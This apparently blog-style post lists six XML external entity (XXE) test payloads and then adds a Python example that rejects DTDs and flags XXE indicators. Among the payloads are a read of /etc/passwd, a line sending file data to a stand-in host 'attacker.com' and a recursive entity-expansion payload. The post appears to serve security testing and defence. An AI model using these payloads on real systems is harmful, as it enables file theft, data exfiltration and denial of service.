Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE-

  1. Basic payload:

<!DOCTYPE replace [<!ENTITY example "Hello World">]>

  2. Retrieving sensitive files:

<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>

  3. Retrieving files via FTP:

<!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]>

  4. Retrieving files via HTTP:

<!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]>

  5. Sending data to a remote server:

<!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]>

  6. Recursive payload:

<!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]>

These payloads are just a few examples, and the specific payload you use will depend on the target application and the data you’re trying to retrieve or manipulate. It’s important to note that XXE injection can be a dangerous vulnerability and should only be used in controlled environments with proper authorization and consent.
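Every payload above depends on the parser accepting a DOCTYPE and then declaring or resolving entities, so the defender's fix is the same for all of them: refuse the DTD outright. The example below is added here and is not code from the original post. It uses only the Python standard library: expat is driven directly so that the DOCTYPE, entity-declaration and external-entity hooks become hard errors, and the element tree is built with ElementTree's TreeBuilder. The sample documents (a benign one plus the post's basic, file and recursive payloads wrapped in a root element) are constructed for the demonstration, and the regex-based classification is a heuristic for logging only, not a replacement for the parser-level refusal.

```python
"""Refuse DTD-based XXE input before any entity is declared or resolved.

Added example, not part of the original post. Standard library only.
"""
import re
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class DtdProhibitedError(ValueError):
    """Input carried a DOCTYPE, an entity declaration or an external entity reference."""


def parse_without_dtd(data: bytes) -> ET.Element:
    """Parse XML with every DTD construct turned into a hard error; returns the root element."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    # expat calls this as soon as it sees "<!DOCTYPE name", before the internal
    # subset is read, so raising here stops all six payloads at the first token.
    def refuse_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdProhibitedError(f"DOCTYPE declaration not allowed (root: {name})")

    # Defence in depth: these never fire once the DOCTYPE hook is active, but
    # they document the intent and protect against a future config change.
    def refuse_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DtdProhibitedError(f"entity declaration not allowed: {name}")

    def refuse_external(context, base, sysid, pubid):
        raise DtdProhibitedError(f"external entity resolution not allowed: {sysid}")

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.EntityDeclHandler = refuse_entity_decl
    parser.ExternalEntityRefHandler = refuse_external
    # Route the ordinary element events into ElementTree's tree builder.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data

    parser.Parse(data, True)  # a handler exception propagates out of Parse()
    return builder.close()


# Heuristic triage of the raw request body for alerting/logging purposes.
_DOCTYPE = re.compile(rb"<!DOCTYPE", re.I)
_EXTERNAL = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)
_PARAMETER = re.compile(rb"<!ENTITY\s+%", re.I)


def classify_xxe_indicators(data: bytes) -> dict:
    """Flag which DTD features a request body uses, for detection logs."""
    return {
        "doctype": bool(_DOCTYPE.search(data)),
        "external_entity": bool(_EXTERNAL.search(data)),
        "parameter_entity": bool(_PARAMETER.search(data)),
    }


# Constructed sample documents: one benign, three taken from the payload list above.
SAMPLES = {
    "benign": b"<root><item>ok</item></root>",
    "basic": b'<!DOCTYPE replace [<!ENTITY example "Hello World">]><replace>&example;</replace>',
    "file": b'<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>'
            b"<replace>&example;</replace>",
    "recursive": b'<!DOCTYPE replace [<!ENTITY example "Hello &example2;">'
                 b'<!ENTITY example2 "&example;&example;&example;">]><replace>&example;</replace>',
}


def check_samples() -> dict:
    """Run every sample through the hardened parser and report the outcome per label."""
    results = {}
    for label, doc in SAMPLES.items():
        try:
            root = parse_without_dtd(doc)
            results[label] = ("parsed", root.tag)
        except DtdProhibitedError as exc:
            results[label] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    for label, outcome in check_samples().items():
        print(f"{label:10s} {outcome[0]:9s} {outcome[1]}  indicators={classify_xxe_indicators(SAMPLES[label])}")
```

Only the benign document parses; the other three are rejected at the DOCTYPE before any entity is declared, so neither the file read nor the recursive expansion ever starts. If an application genuinely needs a DTD, keep the DOCTYPE hook off but leave the entity-declaration and external-entity hooks in place, and add an expansion limit.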
